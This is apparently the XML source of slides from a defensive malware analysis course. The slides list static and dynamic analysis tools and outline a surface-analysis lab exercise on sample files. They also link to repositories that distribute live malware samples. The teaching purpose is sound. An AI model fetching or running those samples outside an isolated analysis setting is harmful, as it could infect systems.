          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Static</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Malware Analysis Tools &amp; Techniques</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Virtual Machines (VMWare, …)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscation techniques</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Disassemblers and Debuggers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Monitoring tools</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Packer Detector &amp; Unpackers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Project </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-134280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>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Tools</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>IDA Pro: disassembler/debugger </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OllyDbg: disassembler/debugger</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PEview: file header analysis</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PEiD: File packer detector</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Dependency Walker: API, DLL explorer </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Wireshark: network protocol analyzer</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Regshot: Registry</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Burp: proxy</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ArpateDNS: DNS</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CheatEngine: process memory </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Tools</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.Net Reflector: reverse .Net code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>On-line</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VirusTotal.com: </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Cuckoo Sandbox: automated malware analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Microsoft</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Sysinternals Suite, Process Explorer (procexp.exe), Process Monitor (procmon.exe), Strings, …</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>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Malware Repositories</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254"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Open Malware</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://oc.gtisc.gatech.edu/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Virushare</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://virusshare.com/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Virusign</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.virusign.com/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Malware DB</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://thezoo.morirt.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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Surface Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256"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Scanning</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>www.virustotal.com</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Packed or Obfuscated</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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String contained</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Hashing check</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>md5deep </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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PE header analysis</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>PEView</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Practice 1 [Surface Analysis]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5472360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="60000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>File: Lab01-01.exe, Lab01-01.dll; Lab01-04.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PEview</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PeiD</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HashCal</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="476"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
